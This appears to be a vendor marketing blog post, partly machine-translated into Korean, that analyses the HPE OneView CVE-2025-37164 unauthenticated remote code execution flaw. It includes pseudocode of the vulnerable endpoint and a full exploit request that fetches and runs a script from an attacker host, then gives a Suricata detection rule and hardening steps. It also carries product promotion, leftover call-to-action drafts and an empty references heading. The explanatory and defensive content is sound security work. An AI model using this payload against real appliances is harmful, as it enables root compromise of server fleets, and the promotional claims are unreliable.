실리콘 인수: CVE-2025-37164(HPE OneView)의 부검과 AI 컴퓨팅 보안의 붕괴

In the burgeoning era of 2026, where “Compute is the new Oil,” the security of the physical data center has never been more critical. While Red Teams spend weeks crafting prompt injections to bypass LLM guardrails, a far more primitive and devastating threat has emerged from the basement of the IT stack.

On December 16, 2025, the security world was rocked by the disclosure of CVE-2025-37164, a vulnerability in HPE OneView carrying the rare and terrifying CVSS Score of 10.0.

For the uninitiated, HPE OneView is the “God Mode” software for modern software-defined infrastructure (SDI). It automates the provisioning of thousands of HPE Synergy and ProLiant servers—the very bare-metal beasts that power the world’s most advanced AI training clusters.

CVE-2025-37164 is an Unauthenticated Remote Code Execution (RCE) vulnerability. It allows any attacker with network access to the management port to execute arbitrary system commands as root, effectively handing over the keys to the entire physical fleet. This article abandons the high-level summary to perform a surgical dissection of the API failure and its implications for AI security engineering.

실리콘 인수: CVE-2025-37164(HPE OneView)의 부검과 AI 컴퓨팅 보안의 붕괴

The Architecture of a “God Mode” Vulnerability

To understand the gravity of this flaw, one must understand the role of OneView. It sits above the BMC (Baseboard Management Controller) and iLO (Integrated Lights-Out) interfaces, aggregating control over compute, storage, and networking fabrics.

The vulnerability resides in a specific REST API endpoint: /rest/id-pools/executeCommand.

1. The Configuration Catastrophe

In secure API design, endpoints capable of executing system commands should be guarded by multiple layers: Authentication (OAuth/Session), Authorization (RBAC), and Input Sanitization.

In affected versions of OneView (prior to 11.0), the endpoint definition for executeCommand suffered from a catastrophic configuration error. The internal security filter map marked this route with auth-type: NO_AUTH.

Hypothetical Backend Logic (Java/Spring Pseudocode):

Java

`@RestController @RequestMapping(“/rest/id-pools”) public class IdPoolController {

// FATAL FLAW: Missing @PreAuthorize("isAuthenticated()")
// This endpoint was likely intended for internal inter-service communication
// but was exposed to the public interface.
@PutMapping("/executeCommand")
public ResponseEntity<String> execute(@RequestBody CommandRequest payload) {
    
    String binary = payload.getCommand();
    String[] args = payload.getArgs();
    
    // FATAL FLAW: Direct injection into ProcessBuilder without sanitization
    ProcessBuilder pb = new ProcessBuilder(binary);
    pb.command().addAll(Arrays.asList(args));
    Process process = pb.start();
    
    return ResponseEntity.ok(readOutput(process));
}

This logic creates a direct tunnel from an HTTP request to the Linux kernel of the appliance.

실리콘 인수: CVE-2025-37164(HPE OneView)의 부검과 AI 컴퓨팅 보안의 붕괴

2. Deconstructing the Kill Chain

The exploit complexity is 낮음. There is no memory corruption to massage, no ASLR to bypass, and no race condition to win. It is a logic flaw pure and simple.

익스플로잇 프리미티브:

An attacker sends a PUT request. The payload is a JSON object defining the command to run.

HTTP

`PUT /rest/id-pools/executeCommand HTTP/1.1 Host: oneview-appliance.local Content-Type: application/json

{ “command”: “/bin/sh”, “args”: [“-c”, “wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x”] }`

The Result:

The appliance executes the script. The attacker receives a reverse shell with root privileges. From here, they have persistence on the network controller itself.

The AI Infrastructure Threat Landscape

Why is this specific to the “Hardcore AI Security Engineer”? Because AI infrastructure is uniquely vulnerable to this class of attack.

1. The GPU Heist (Cryptojacking & Theft)

AI training clusters utilize H100/B200 GPUs, which are incredibly valuable. An attacker with root access to OneView can:

Provision Rogue Workloads: Spin up hidden VMs on the bare metal to mine cryptocurrency, siphoning off megawatts of power and cooling capacity.
Resource Denial: During a critical training run (which might cost millions), the attacker can issue a power off command to the physical blades via the iLO interface, causing catastrophic data loss and project delays.

2. Supply Chain Poisoning via Firmware

OneView manages firmware updates for the server fleet. An attacker with root access can:

Flash Malicious Firmware: Downgrade BIOS/UEFI to vulnerable versions or implant persistent rootkits (like BlackLotus) into the SPI flash of the AI servers.
Persistent Access: Even if the OS is wiped and reinstalled, the malware survives in the hardware, compromising every future model trained on that machine.

3. Lateral Movement to Data Lakes

High-performance AI clusters are tightly coupled with storage fabrics (Infiniband/RoCE). OneView manages these connections. Compromising OneView allows an attacker to mount the underlying NAS/SAN volumes, granting direct access to proprietary datasets and model weights without ever touching the corporate AD network.

AI 기반 방어: 펜리젠트의 이점

Detecting infrastructure vulnerabilities like CVE-2025-37164 is a blind spot for traditional Web Application Scanners (DAST). DAST tools crawl HTML; they rarely probe obscure management APIs on non-standard ports.

여기에서 Penligent.ai represents a paradigm shift for Infrastructure Security.

1. Out-of-Band (OOB) Asset Mapping

Penligent’s AI Agents utilize Full-Stack Asset Mapping. They don’t just scan for web apps; they actively listen for management protocol signatures (IPMI, Redfish, HPE REST API). The AI correlates these signatures with the latest threat intelligence, identifying the “Shadow Infrastructure” that IT forgot to patch.

2. Non-Destructive RCE Verification

Scanning a production AI cluster is risky. A bad scan can crash a server. Penligent uses 컨텍스트 인식 퍼징 to perform non-destructive verification.

Safe Payload: Instead of sending rm -rf / or a reverse shell, Penligent sends a benign payload like echo "Penligent_Check".
Validation: The AI analyzes the HTTP response. If it sees the echoed string, it confirms the RCE with 100% certainty, allowing the security team to prioritize the patch without crashing the training job.

Is your DAST scanner blind to Management APIs? Penligent isn’t. >>

Blue Team Handbook: Detection & Hardening

If you cannot patch immediately, you are in a “Breach Assumed” state.

1. Network Detection (Suricata/Snort)

Monitor traffic to the OneView management subnet. Look for HTTP PUT 또는 POST requests to /rest/id-pools/executeCommand.

Suricata Rule:

YAML

alert http $EXTERNAL_NET any -> $ONEVIEW_SERVER 443 (msg:"ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"; \\ flow:established,to_server; \\ content:"/rest/id-pools/executeCommand"; http_uri; \\ content:"command"; http_client_body; \\ content:"/bin/"; http_client_body; \\ classtype:attempted-admin; sid:1000025; rev:1;)

2. Log Auditing

Check the OneView audit logs (ci-debug.log 또는 audit.log) for unexpected calls to the IdPools controller originating from IP addresses that are not the designated Bastion Host.

3. Architectural Quarantine

Management VLAN: Ensure the OneView appliance interface is on a strictly isolated VLAN, accessible only via a VPN with MFA.
ACLs: Apply Access Control Lists at the switch level to block all traffic to port 443 on the OneView appliance, except from the specific IP of the system administrator’s workstation.

결론

CVE-2025-37164 serves as a brutal reminder that the “Cloud” is just someone else’s computer, and that computer has a management port. In the rush to build AGI, we must not neglect the concrete foundation it stands on.

The security of the AI future depends not just on robust model alignment, but on the integrity of the silicon supply chain. Upgrade your firmware, isolate your management planes, and employ intelligent, automated validation to ensure your “God Mode” console doesn’t become an attacker’s playground.

신뢰할 수 있는 참조 자료

🚀 CTA Options

Option 1 (Pain Point – Recommended):

Is your DAST scanner blind to Management APIs? Penligent isn’t.

Stop ignoring your infrastructure. Detect hidden RCEs in your AI compute cluster with Penligent today.

Option 2 (Urgency):